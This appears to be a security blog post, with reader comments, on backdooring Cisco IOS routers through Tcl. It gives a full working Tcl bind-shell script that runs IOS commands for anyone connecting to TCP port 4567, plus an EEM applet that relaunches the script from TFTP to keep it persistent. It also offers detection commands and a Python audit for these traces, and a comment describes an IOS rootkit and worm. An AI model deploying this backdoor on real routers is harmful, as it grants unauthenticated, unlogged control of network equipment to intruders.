Attacking Cisco Router over TCL

Today only a lazy person, or one outside the IT sphere, has never heard of Cisco, a company specialising in network devices and everything around them. IOS (Internetwork Operating System) runs on Cisco networking equipment and allows flexible configuration of the device. There are several ways of attacking Cisco devices; what we will look at here is attacking them using Tcl.

Tcl (Tool Command Language) is a scripting language used on embedded platforms, both in its full form and in several small-footprint variants. Since Cisco IOS version 12.3 (7/28/2003) Tcl has been included in IOS as a general-purpose scripting language.

When you first log in to a Cisco router you are in user EXEC mode (privilege level 1). From this mode you can only view information such as interface status or the routes in the routing table. To execute a Tcl script with tclsh you need privilege level 15 (full administrative rights), the equivalent of root on UNIX or Administrator on Windows.

To upload the Tcl script to the Cisco device we can use different protocols such as TFTP, RCP or SCP. With TFTP it looks like this (the copy itself already requires enable / privilege level 15):

Router>en
Router# copy tftp://tftpserver/script.tcl flash://script.tcl
Router# tclsh flash://script.tcl

The Tcl script below was originally published by Andy Davis of Information Risk Management (IRM); after some modification it looks as follows:

proc callback {sock addr port} {
    # One handler per accepted client: LF line endings, line buffered
    fconfigure $sock -translation lf -buffering line
    puts $sock " Enter your desired IOS command:"
    puts $sock " "
    puts -nonewline $sock "Router# "
    flush $sock
    # Run "echo" every time the client sends data
    fileevent $sock readable [list echo $sock]
}
proc echo {sock} {
    if {[catch {gets $sock line} n] || $n < 0} {
        # Client disconnected (or read error): release the socket, keep listening
        close $sock
    } else {
        # In IOS tclsh, exec runs an IOS EXEC command and returns its output;
        # catch stores either the output or the error message in response
        catch {exec "$line"} response
        puts $sock $response
        puts -nonewline $sock "Router# "
        flush $sock
    }
}
set port 4567
set sh [socket -server callback $port]
# Enter the event loop; var is never set, so the listener runs until the script is killed
vwait var
close $sh

This gives us a backdoor on the router: an attacker who telnets to port 4567 sees the following:

$ telnet router 4567
Trying router...
Connected to router.
Escape character is '^]'.

Enter your desired IOS command:

Router#

This has been fixed in recent IOS versions, but you can still use the same technique if you convert the tclsh invocation into an EEM (Embedded Event Manager) applet and trigger it from a timer event. Note that a countdown timer fires once, 20 seconds after the applet is registered here; to re-launch the script periodically use an `event timer watchdog` instead. The applet looks as follows:

Router>en
Router# conf t
Router(config)# event manager applet Tclsh
Router(config-applet)# event timer countdown time 20 name Delay
Router(config-applet)# action 1.0 cli command "enable"
Router(config-applet)# action 2.0 cli command "tclsh tftp://tftpserver/script.tcl"

By running the backdoor a penetration tester gains access to the target without passing through the normal controls: no VTY authentication is asked for, and the session is not recorded as a login. To check whether your router is listening on a port you never configured, run:

Router# show tcp brief all

This is the equivalent of netstat on Windows or Linux: it lists every TCP connection on the router, established or waiting to be established, and a LISTEN entry on an unexpected port (4567 in the example above) is the sign to look for. Since the EEM variant re-launches the script from the configuration, also run `show event manager policy registered` and `show running-config | section event manager` and check that no applet action invokes tclsh. So for the security of your business make sure you run the latest IOS version, keep all your systems updated and follow best practice when deploying and configuring any device.
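As an added example (not part of the original post and not Andy Davis's code), here is a small Python audit that runs over the output of the two checks above, `show tcp brief all` and `show running-config | section event manager`, and flags exactly the traces this backdoor leaves behind: a LISTEN socket on a port the router was never configured to serve, any established session to that port, and any EEM applet whose CLI action launches tclsh. The two captures and the set of expected listening ports are constructed for the example; the parser assumes the real `show tcp brief all` output has one socket per line with the local port as the last dot-separated field of the local address.

```python
import re

# Constructed sample of "show tcp brief all" output (not captured from a real router).
# Port 4567 is the backdoor from the Tcl script above; 22/23 are normal management.
SHOW_TCP_BRIEF_ALL = """\
TCB       Local Address               Foreign Address             (state)
6523A4FC  *.22                        *.*                         LISTEN
6523B0A0  *.23                        *.*                         LISTEN
6523C0F8  *.4567                      *.*                         LISTEN
6523D1C4  10.1.1.1.4567               192.0.2.50.51234            ESTAB
6523E2D0  10.1.1.1.23                 10.1.1.2.49152              ESTAB
"""

# Constructed sample of "show running-config | section event manager".
# The first applet is the persistence trick from the post; the second is benign.
RUNNING_CONFIG_EEM = """\
event manager applet Tclsh
 event timer countdown time 20 name Delay
 action 1.0 cli command "enable"
 action 2.0 cli command "tclsh tftp://tftpserver/script.tcl"
event manager applet Housekeeping
 event timer cron cron-entry "0 2 * * *" name Nightly
 action 1.0 syslog msg "nightly housekeeping"
"""

# Ports this (assumed) environment expects the router to listen on: SSH, telnet, BGP.
EXPECTED_LISTEN_PORTS = {22, 23, 179}


def parse_tcp_brief(text):
    """Return (local_ip, local_port, foreign, state) tuples from show tcp brief all."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        # Data rows have exactly four columns: TCB, local, foreign, state
        if len(parts) != 4 or parts[0] == "TCB":
            continue
        _tcb, local, foreign, state = parts
        ip, port = local.rsplit(".", 1)   # "*.4567" -> ("*", "4567"), "10.1.1.1.23" -> ("10.1.1.1", "23")
        rows.append((ip, int(port), foreign, state))
    return rows


def unexpected_listeners(text, expected=EXPECTED_LISTEN_PORTS):
    """Listening ports that are not in the allow-list."""
    return sorted({port for _ip, port, _foreign, state in parse_tcp_brief(text)
                   if state == "LISTEN" and port not in expected})


def sessions_to_port(text, port):
    """(local_ip, foreign) pairs of established sessions on the given local port."""
    return [(ip, foreign) for ip, p, foreign, state in parse_tcp_brief(text)
            if p == port and state == "ESTAB"]


def tclsh_applets(config):
    """Names of EEM applets with a CLI action that invokes tclsh."""
    applets, current = {}, None
    for line in config.splitlines():
        m = re.match(r"event manager applet (\S+)", line)
        if m:
            current = m.group(1)
            applets[current] = []
        elif current and line.startswith(" "):
            applets[current].append(line.strip())
    return sorted(name for name, actions in applets.items()
                  if any(re.search(r'cli command "?tclsh\b', a, re.IGNORECASE) for a in actions))


def audit(tcp_text, config_text):
    """One finding string per suspicious artefact; empty list means nothing found."""
    findings = []
    for port in unexpected_listeners(tcp_text):
        findings.append(f"unexpected listener on TCP port {port}")
        for ip, foreign in sessions_to_port(tcp_text, port):
            findings.append(f"established session {foreign} -> {ip}:{port}")
    for name in tclsh_applets(config_text):
        findings.append(f"EEM applet {name} launches tclsh")
    return findings


if __name__ == "__main__":
    for finding in audit(SHOW_TCP_BRIEF_ALL, RUNNING_CONFIG_EEM):
        print(finding)
```

Replace the two constructed strings with output collected over SSH (or pasted from the console) and adjust `EXPECTED_LISTEN_PORTS` to the services the router really offers; everything else in the listing is noise until a LISTEN entry or a tclsh applet shows up that you did not put there.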

Warning: the technique demonstrated is intended only for use during an authorized penetration test.

References:

Cisco IOS Scripting with Tcl
http://www.cisco.com/en/US/docs/ios/12_3t/12_3t2/feature/guide/gt_tcl.html

SANS Institute, IOScat - a Port of Netcat's TCP functions to Cisco IOS
http://www21.sans.org/reading_room/whitepapers/tools/iosmap-tcp-udp-port-scanning-cisco-ios-platforms_32964


Jbossvi

Yeah, I demoed this at Black Hat 2010:
http://blackhat.com/html/bh-us-10/bh-us-10-specialevents_arsenal.html#nehrboss

It was an IOS rootkit and a self-propagating IOS worm. The rootkit had a forward/reverse shell, a traffic pcap dumper, a malware httpd server and other stuff. It was all done in tclsh.

Mourad

Thanks for the comment Jason, can I have more details about the lab?

Jbossvi

Here is the PDF, with lots of examples of the rootkit and accessories. The worm is not public though.

http://www.surf.vi/docs/san_fran.pdf

Mourad

Thanks for sharing Jason, very interesting demonstration.

E-devlet

This is one of the best posts that I've ever seen; you may include some more ideas on the same theme. I'm still waiting for some interesting thoughts from your side in your next post.


fmarousek

The first version of this attack (using tclsh) was fixed in IOS 12.4(15)T, the second (using an EEM policy) in IOS 12.4(20)T1.

johnright

Awesome.

trackback

[…] Today, browsing a foreign site, I found an article on a method of leaving a backdoor on a Cisco router. Although I haven't touched Cisco for over a year and don't use this stuff at work, I still love Cisco, heh! To the point: it is an English article and not hard to read. The main idea is that once you have obtained privileges on a Cisco router you can upload a backdoor written in the Tcl scripting language to the device, after which you can telnet into the router remotely without needing router admin privileges. Very powerful! Advanced Cisco players at the CCIE Security level are surely familiar with Tcl scripting; when I studied for CCNP the course hardly mentioned Tcl scripts at all. On Cisco it is a very powerful thing and can help engineers get a lot of tedious work done, for example pinging an IP address range in bulk from the device. […]

I_laji.co

Hmm, here I have a question:
How do I configure Tcl on Cisco IOS if it has not been configured? IOS version > 12.4(20)T